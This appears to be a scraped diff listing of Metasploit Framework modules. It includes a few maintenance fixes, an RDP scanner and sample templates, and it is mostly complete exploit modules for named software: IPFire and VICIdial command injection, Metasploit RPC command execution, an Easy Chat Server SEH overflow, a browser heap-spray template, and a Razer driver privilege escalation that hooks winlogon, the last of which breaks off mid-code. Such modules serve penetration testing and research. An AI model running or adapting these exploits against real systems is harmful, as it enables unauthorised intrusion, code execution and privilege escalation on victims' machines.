# Library for processing and creating Zip compatbile archives
spec.add_runtime_dependency 'rex-zip'
# Library for parsing offline Windows Registry files

View File

@ -30,6 +30,11 @@ class MetasploitModule < Msf::Auxiliary
# generate our wordlist and close the file handle
wordlist = wordlist_file
unless wordlist
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
return
end
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"
cracker.wordlist = wordlist.path

View File

@ -29,6 +29,11 @@ class MetasploitModule < Msf::Auxiliary
# generate our wordlist and close the file handle
wordlist = wordlist_file
unless wordlist
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
return
end
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"
cracker.wordlist = wordlist.path

View File

@ -44,6 +44,11 @@ class MetasploitModule < Msf::Auxiliary
# generate our wordlist and close the file handle
wordlist = wordlist_file
unless wordlist
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
return
end
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"
cracker.wordlist = wordlist.path

View File

@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary
# generate our wordlist and close the file handle
wordlist = wordlist_file
unless wordlist
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
return
end
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"
cracker.wordlist = wordlist.path

View File

@ -30,6 +30,11 @@ class MetasploitModule < Msf::Auxiliary
# generate our wordlist and close the file handle
wordlist = wordlist_file
unless wordlist
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
return
end
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"
cracker.wordlist = wordlist.path

View File

@ -34,6 +34,11 @@ class MetasploitModule < Msf::Auxiliary
# generate our wordlist and close the file handle
wordlist = wordlist_file
unless wordlist
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
return
end
wordlist.close

View File

@ -0,0 +1,44 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# This sample auxiliary module simply displays the selected action and
# registers a custom command that will show up when the module is used.
#
###
class MetasploitModule < Msf::Auxiliary
def initialize(info={})
super(update_info(info,
'Name' => 'Sample Auxiliary Module',
# The description can be multiple lines, but does not preserve formatting.
'Description' => 'Sample Auxiliary Module',
'Author' => ['Joe Module <joem@example.com>'],
'License' => MSF_LICENSE,
'Actions' =>
[
['Default Action'],
['Another Action']
]
))
end
def run
print_status("Running the simple auxiliary module with action #{action.name}")
end
# auxiliary modules can register new commands, they all call cmd_* to
# dispatch them
def auxiliary_commands
return { "aux_extra_command" => "Run this auxiliary test commmand" }
end
def cmd_aux_extra_command(*args)
print_status("Running inside aux_extra_command(#{args.join(" ")})")
end
end

View File

@ -73,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
def on_request_exploit(cli, req, target_info)
print_target_info(cli, target_info)
send_not_found(cli)
send_response(cli, '')
end
def run

View File

@ -0,0 +1,104 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Identify endpoints speaking the Remote Desktop Protocol (RDP)',
'Description' => %q(
This module attempts to connect to the specified Remote Desktop Protocol port
and determines if it speaks RDP.
),
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['URL', 'https://msdn.microsoft.com/en-us/library/cc240445.aspx']
],
'License' => MSF_LICENSE
)
)
register_options(
[
Opt::RPORT(3389),
OptBool.new('TLS', [true, 'Wheter or not request TLS security', true]),
OptBool.new('CredSSP', [true, 'Whether or not to request CredSSP', true]),
OptBool.new('EarlyUser', [true, 'Whether to support Earlier User Authorization Result PDU', false])
]
)
end
# any TPKT v3 + x.2224 COTP Connect Confirm
RDP_RE = /^\x03\x00.{3}\xd0.{5}.*$/
def rdp?
sock.put(@probe)
response = sock.get_once(-1)
if response
if RDP_RE.match?(response)
# XXX: it might be helpful to decode the response and show what was selected.
print_good("Identified RDP")
return true
else
vprint_status("No match for '#{Rex::Text.to_hex_ascii(response)}'")
end
else
vprint_status("No response")
end
end
def setup
# build a simple TPKT v3 + x.224 COTP Connect Request. optionally append
# RDP negotiation request with TLS, CredSSP and Early User as requesteste
requested_protocols = 0
if datastore['TLS']
requested_protocols = requested_protocols ^ 0b1
end
if datastore['CredSSP']
requested_protocols = requested_protocols ^ 0b10
end
if datastore['EarlyUser']
requested_protocols = requested_protocols ^ 0b1000
end
if requested_protocols == 0
tpkt_len = 11
cotp_len = 6
pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0 ]
pack_string = "CCnCCnnC"
else
tpkt_len = 19
cotp_len = 14
pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0, 1, 0, 8, 0, requested_protocols ]
pack_string = "CCnCCnnCCCCCV"
end
@probe = pack.pack(pack_string)
end
def run_host(_ip)
begin
connect
return unless rdp?
rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \
::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e
vprint_error("error while connecting and negotiating RDP: #{e}")
return
ensure
disconnect
end
report_service(
host: rhost,
port: rport,
proto: 'tcp',
name: 'RDP'
)
end
end

View File

@ -630,19 +630,19 @@ class MetasploitModule < Msf::Auxiliary
def key_from_pqe(p, q, e)
# Returns an RSA Private Key from Factors
key = OpenSSL::PKey::RSA.new()
key.set_factors(p, q)
key.p = p
key.q = q
key.n = key.p*key.q
key.e = e
n = key.p * key.q
phi = (key.p - 1) * (key.q - 1 )
key.d = key.e.mod_inverse(phi)
d = OpenSSL::BN.new(e).mod_inverse(phi)
key.dmp1 = key.d % (key.p - 1)
key.dmq1 = key.d % (key.q - 1)
key.iqmp = key.q.mod_inverse(key.p)
key.set_key(n, e, d)
dmp1 = key.d % (key.p - 1)
dmq1 = key.d % (key.q - 1)
iqmp = key.q.mod_inverse(key.p)
key.set_crt_params(dmp1, dmq1, iqmp)
return key
end

View File

@ -0,0 +1,95 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
#
# This exploit affects TCP servers, so we use the TCP client mixin.
# See ./documentation/samples/vulnapps/testsrv/testsrv.c for building the
# vulnerable target program.
#
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
# The Name should be just like the line of a Git commit - software name,
# vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
# some search optimization so people can actually find the module.
# We encourage consistency between module name and file name.
'Name' => 'Sample Exploit',
'Description' => %q{
This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug.
},
'License' => MSF_LICENSE,
'Author' => ['skape'],
'References' =>
[
[ 'OSVDB', '12345' ],
[ 'EDB', '12345' ],
[ 'URL', 'http://www.example.com'],
[ 'CVE', '1978-1234'],
],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Windows All
[
'Windows XP/Vista/7/8',
{
'Platform' => 'win',
'Ret' => 0x41424344
}
],
],
'DisclosureDate' => "Apr 1 2013",
# Note that this is by index, rather than name. It's generally easiest
# just to put the default at the beginning of the list and skip this
# entirely.
'DefaultTarget' => 0))
end
#
# The sample exploit just indicates that the remote host is always
# vulnerable.
#
def check
Exploit::CheckCode::Vulnerable
end
#
# The exploit method connects to the remote service and sends 1024 random bytes
# followed by the fake return address and then the payload.
#
def exploit
connect
print_status("Sending #{payload.encoded.length} byte payload...")
# Build the buffer for transmission
buf = rand_text_alpha(1024)
buf << [ target.ret ].pack('V')
buf << payload.encoded
# Send it off
sock.put(buf)
sock.get_once
handler
end
end

View File

@ -0,0 +1,119 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'IPFire proxy.cgi RCE',
'Description' => %q(
IPFire, a free linux based open source firewall distribution,
version < 2.19 Update Core 110 contains a remote command execution
vulnerability in the ids.cgi page in the OINKCODE field.
),
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # module
'0x09AL' # discovery
],
'References' =>
[
[ 'EDB', '42149' ]
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' => { 'SSL' => true },
'Arch' => [ ARCH_CMD ],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl awk openssl'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 09 2017'
)
)
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
Opt::RPORT(444)
]
)
end
def check
begin
# authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
# after a chat with @bcoles in IRC.
res = send_request_cgi(
'uri' => '/cgi-bin/pakfire.cgi',
'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
)
if res && res.code == 200
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
end
if version.nil? || update.nil? || !Gem::Version.correct?(version)
vprint_error('No Recognizable Version Found')
CheckCode::Safe
elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110
CheckCode::Appears
else
vprint_error('Version and/or Update Not Supported')
CheckCode::Safe
end
rescue ::Rex::ConnectionError
print_error("Connection Failed")
CheckCode::Safe
end
end
def exploit
begin
# authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
# after a chat with @bcoles in IRC.
vprint_status('Sending request')
res = send_request_cgi(
'uri' => '/cgi-bin/ids.cgi',
'method' => 'POST',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>
{
'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
},
'vars_post' => {
'ENABLE_SNORT_GREEN' => 'on',
'ENABLE_SNORT' => 'on',
'RULES' => 'registered',
'OINKCODE' => "`#{payload.encoded}`",
'ACTION' => 'Download new ruleset',
'ACTION2' => 'snort'
}
)
# success means we hang our session, and wont get back a response, so just check we get a response back
if res && res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end

View File

@ -0,0 +1,152 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/rpc/v10/client'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit RPC Console Command Execution',
'Description' => %q{
This module connects to a specified Metasploit RPC server and
uses the 'console.write' procedure to execute operating
system commands. Valid credentials are required to access the
RPC interface.
This module has been tested successfully on Metasploit 4.15
on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
4.14 on Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
'References' =>
[
[ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
[ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
],
'Platform' => %w{ ruby unix win },
'Targets' => [
[ 'Ruby', { 'Arch' => ARCH_RUBY,
'Platform' => 'ruby',
'Payload' => { 'BadChars' => "\x00" } } ],
[ 'Windows CMD', { 'Arch' => ARCH_CMD,
'Platform' => 'win',
'Payload' => { 'BadChars' => "\x00\x0A\x0D" } } ],
[ 'Unix CMD', { 'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' => { 'BadChars' => "\x00\x0A\x0D" } } ]
],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
'Privileged' => false,
'DisclosureDate' => 'May 22 2011',
'DefaultTarget' => 0))
register_options [ Opt::RPORT(55552),
OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
OptBool.new('SSL', [ true, 'Use SSL', true]) ]
end
def execute_command(cmd, opts = {})
res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"
if res.nil?
fail_with Failure::Unknown, 'Connection failed'
end
unless res['wrote'].to_s =~ /\A\d+\z/
print_error "Could not write to console #{@console_id}:"
print_line res.to_s
return
end
vprint_good "Wrote #{res['wrote']} bytes to console"
end
def exploit
begin
@rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
rescue Rex::ConnectionRefused => e
fail_with Failure::Unreachable, 'Connection refused'
rescue => e
fail_with Failure::Unknown, "Connection failed: #{e}"
end
res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']
if @rpc.token.nil?
fail_with Failure::NoAccess, 'Authentication failed'
end
print_good 'Authenticated successfully'
vprint_status "Received temporary token: #{@rpc.token}"
version = @rpc.call 'core.version'
if res.nil?
fail_with Failure::Unknown, 'Connection failed'
end
print_status "Metasploit #{version['version']}"
print_status "Ruby #{version['ruby']}"
print_status "API version #{version['api']}"
vprint_status 'Creating new console...'
res = @rpc.call 'console.create'
if res.nil?
fail_with Failure::Unknown, 'Connection failed'
end
unless res['id'].to_s =~ /\A\d+\z/
print_error 'Could not create console:'
print_line res.to_s
return
end
@console_id = res['id']
print_good "Created console ##{@console_id}"
print_status 'Sending payload...'
case target['Platform']
when 'ruby'
cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
when 'win'
cmd = payload.encoded
when 'unix'
cmd = payload.encoded
else
fail_with Failure::NoTarget, 'Invalid target'
end
execute_command cmd
end
def cleanup
return if @console_id.nil?
vprint_status 'Removing console...'
res = @rpc.call 'console.destroy', @console_id
if res.nil?
print_error 'Connection failed'
return
end
unless res['result'].eql? 'success'
print_warning "Could not destroy console ##{@console_id}:"
print_line res.to_s
return
end
vprint_good "Destroyed console ##{@console_id}"
ensure
@rpc.close
end
end

View File

@ -0,0 +1,112 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'VICIdial user_authorization Unauthenticated Command Execution',
'Description' => %q{
This module exploits a vulnerability in VICIdial versions
2.9 RC 1 to 2.13 RC1 which allows unauthenticated users
to execute arbitrary operating system commands as the web
server user if password encryption is enabled (disabled
by default).
When password encryption is enabled the user's password
supplied using HTTP basic authentication is used in a call
to exec().
This module has been tested successfully on version 2.11 RC2
and 2.13 RC1 on CentOS.
},
'License' => MSF_LICENSE,
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
'References' =>
[
['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
# HTTP Basic authentication password
'Space' => 2048,
# apostrophe ('), quote ("), semi-colon (;) and backslash (\)
# are removed by preg_replace
'BadChars' => "\x00\x0A\x22\x27\x3B\x5C",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python netcat'
}
},
'Targets' => [[ 'Automatic Targeting', {} ]],
'Privileged' => false,
'DisclosureDate' => 'May 26 2017',
'DefaultTarget' => 0))
register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ])
deregister_options('USERNAME', 'PASSWORD')
end
def check
user = rand_text_alpha(rand(10) + 5)
pass = "#{rand_text_alpha(rand(10) + 5)}&#"
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
'authorization' => basic_auth(user, pass)
unless res
vprint_status 'Connection failed'
return CheckCode::Unknown
end
if res.code != 401
vprint_status "#{peer} Unexpected reply. Expected authentication failure."
return CheckCode::Safe
end
# Check for input filtering of '#' and '&' characters in password
# Response for invalid credentials is in the form of: |<username>|<password>|BAD|
if res.body !~ /\|#{user}\|#{pass}\|BAD\|/
vprint_status "#{peer} Target is patched."
return CheckCode::Safe
end
# Check for ../agc/bp.pl password encryption script
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl')
if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/
vprint_status "#{peer} Password encryption is supported, but may not be enabled."
return CheckCode::Appears
end
vprint_status "#{peer} Could not verify whether password encryption is supported."
CheckCode::Detected
end
def execute_command(cmd, opts = {})
user = rand_text_alpha(rand(10) + 5)
pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #"
print_status "#{peer} Sending payload (#{cmd.length} bytes)"
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
'authorization' => basic_auth(user, pass)
if !res
fail_with(Failure::Unreachable, 'Connection failed')
elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/
print_good "#{peer} Payload sent successfully"
else
fail_with(Failure::UnexpectedReply, 'Unexpected reply')
end
end
def exploit
execute_command(payload.encoded)
end
end

View File

@ -0,0 +1,144 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# This exploit sample demonstrates how a typical browser exploit is written using commonly
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
#
###
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
# Set :classid and :method for ActiveX exploits. For example:
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
# :method => "SetShapeNodeType",
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "10.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => NormalRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "Module Name",
'Description' => %q{
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
the browser version. Please note IE8 and newer may emulate an older IE version
in compatibility mode, in that case the module won't be able to detect the
browser correctly.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
],
'Payload' =>
{
'BadChars' => "\x00", # js_property_spray
'StackAdjustment' => -3500
},
'Privileged' => false,
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0))
end
def get_target(agent)
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
when '6.2'
os_name = 'Windows 8'
when '6.3'
os_name = 'Windows 8.1'
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
return t
end
end
nil
end
def get_payload(t)
stack_pivot = "\x41\x42\x43\x44"
code = payload.encoded
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
else
print_status("Using JRE ROP")
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
end
rop_payload
end
def get_html(t)
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
html = %Q|
<script>
#{js_property_spray}
var s = unescape("#{js_p}");
sprayHeap({shellcode:s});
</script>
|
html.gsub(/^\t\t/, '')
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("Requesting: #{request.uri}")
target = get_target(agent)
if target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
print_status("Target selected as: #{target.name}")
html = get_html(target)
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
end
end

View File

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a buffer overflow during user registration in Easy Chat Server software.
},
'Author' =>
[
'Marco Rivoli', #Metasploit
'Aitezaz Mohsin' #POC
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '42155' ],
],
'Privileged' => true,
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
],
'DefaultOptions' => {
'RPORT' => 80,
'EXITFUNC' => 'thread',
'ENCODER' => 'x86/alpha_mixed'
},
'DisclosureDate' => 'Oct 09 2017',
'DefaultTarget' => 0))
end
def exploit
sploit = rand_text_alpha_upper(217)
sploit << "\xeb\x06\x90\x90"
sploit << [target.ret].pack('V')
sploit << payload.encoded
sploit << rand_text_alpha_upper(200)
res = send_request_cgi({
'uri' => normalize_uri(URI,'registresult.htm'),
'method' => 'POST',
'vars_post' => {
'UserName' => sploit,
'Password' => 'test',
'Password1' => 'test',
'Sex' => 1,
'Email' => 'x@',
'Icon' => 'x.gif',
'Resume' => 'xxxx',
'cw' => 1,
'RoomID' => 4,
'RepUserName' => 'admin',
'submit1' => 'Register'
}
})
handler
end
end

View File

@ -0,0 +1,260 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/local/windows_kernel'
require 'rex'
require 'metasm'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Local::WindowsKernel
include Msf::Post::Windows::Priv
# the max size our hook can be, used before it's generated for the allocation
HOOK_STUB_MAX_LENGTH = 256
def initialize(info = {})
super(update_info(info,
'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',
'Description' => %q{
A vulnerability exists in the latest version of Razer Synapse
(v2.20.15.1104 as of the day of disclosure) which can be leveraged
locally by a malicious application to elevate its privileges to those of
NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
in the rzpnk.sys driver that passes a PID specified by the user to
ZwOpenProcess. This can be issued by an application to open a handle to
an arbitrary process with the necessary privileges to allocate, read and
write memory in the specified process.
This exploit leverages this vulnerability to open a handle to the
winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
installing a hook to execute attacker controlled shellcode. This hook is
then triggered on demand by calling user32!LockWorkStation(), resulting
in the attacker's payload being executed with the privileges of the
infected winlogon process. In order for the issued IOCTL to work, the
RazerIngameEngine.exe process must not be running. This exploit will
check if it is, and attempt to kill it as necessary.
The vulnerable software can be found here:
https://www.razerzone.com/synapse/. No Razer hardware needs to be
connected in order to leverage this vulnerability.
This exploit is not opsec-safe due to the user being logged out as part
of the exploitation process.
},
'Author' => 'Spencer McIntyre',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-9769'],
['URL', 'https://warroom.securestate.com/cve-2017-9769/']
],
'Platform' => 'win',
'Targets' =>
[
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 10.0.10586
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 20
},
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => 'Mar 22 2017'))
end
def check
# Validate that the driver has been loaded and that
# the version is the same as the one expected
client.sys.config.getdrivers.each do |d|
if d[:basename].downcase == 'rzpnk.sys'
expected_checksum = 'b4598c05d5440250633e25933fff42b0'
target_checksum = client.fs.file.md5(d[:filename])
if expected_checksum == Rex::Text.to_hex(target_checksum, '')
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
end
Exploit::CheckCode::Safe
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if session.platform != 'windows'
fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
elsif session.arch != ARCH_X64
fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
end
pid = session.sys.process['RazerIngameEngine.exe']
if pid
# if this process is running, the IOCTL won't work but the process runs
# with user privileges so we can kill it
print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")
session.sys.process.kill(pid)
end
pid = session.sys.process['winlogon.exe']
print_status("Found winlogon pid: #{pid}")
handle = get_handle(pid)
fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
vprint_status('Successfully opened a handle to the winlogon process')
winlogon = session.sys.process.new(pid, handle)
allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
shellcode_address = winlogon.memory.allocate(allocation_size)
winlogon.memory.protect(shellcode_address)
print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
winlogon.memory.write(shellcode_address, payload.encoded)
hook_stub_address = shellcode_address + payload.encoded.length
result = session.railgun.kernel32.LoadLibraryA('user32')
fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
user32_handle = result['return']
# resolve and backup the functions that we'll install trampolines in
user32_trampolines = {} # address => original chunk
user32_functions = ['LockWindowStation']
user32_functions.each do |function|
address = get_address(user32_handle, function)
winlogon.memory.protect(address)
user32_trampolines[function] = {
address: address,
original: winlogon.memory.read(address, 24)
}
end
# generate and install the hook asm
hook_stub = get_hook(shellcode_address, user32_trampolines)
fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
# if this happens, there was a programming error
fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
winlogon.memory.write(hook_stub_address, hook_stub)
vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
# install the asm trampolines to jump to the hook
user32_trampolines.each do |function, trampoline_info|
address = trampoline_info[:address]
trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
mov rax, 0x#{address.to_s(16)}
push rax
mov rax, 0x#{hook_stub_address.to_s(16)}
jmp rax
}).encode_string
winlogon.memory.write(address, trampoline)
vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}")
end
session.railgun.user32.LockWorkStation()
session.railgun.kernel32.CloseHandle(handle)
end
def get_address(dll_handle, function_name)
result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)
fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0
result['return']
end
# this is where the actual vulnerability is leveraged
def get_handle(pid)
handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
return nil unless handle
vprint_status('Successfully opened a handle to the driver')
buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')
session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[
['DWORD', 'FileHandle', 'in' ],
['DWORD', 'Event', 'in' ],
['LPVOID', 'ApcRoutine', 'in' ],
['LPVOID', 'ApcContext', 'in' ],
['PDWORD', 'IoStatusBlock', 'out'],
['DWORD', 'IoControlCode', 'in' ],
['PBLOB', 'InputBuffer', 'in' ],
['DWORD', 'InputBufferLength', 'in' ],
['PBLOB', 'OutputBuffer', 'out'],
['DWORD', 'OutputBufferLength', 'in' ],
])
result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)
return nil if result['return'] != 0
session.railgun.kernel32.CloseHandle(handle)
result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]
end
def get_hook(shellcode_address, restore)
dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']
return nil if dll_handle == 0
create_thread_address = get_address(dll_handle, 'CreateThread')
stub = %{
call main
; restore the functions where the trampolines were installed
push rbx
}
restore.each do |function, trampoline_info|
original = trampoline_info[:original].unpack('Q*')
stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}"
original.each do |chunk|
stub << %{
mov rbx, 0x#{chunk.to_s(16)}
mov qword ptr ds:[rax], rbx
add rax, 8
}
end
end
stub << %{
pop rbx
ret
main:
; backup registers we're going to mangle
push r9
push r8
push rdx
push rcx
; setup the arguments for the call to CreateThread
xor rax, rax
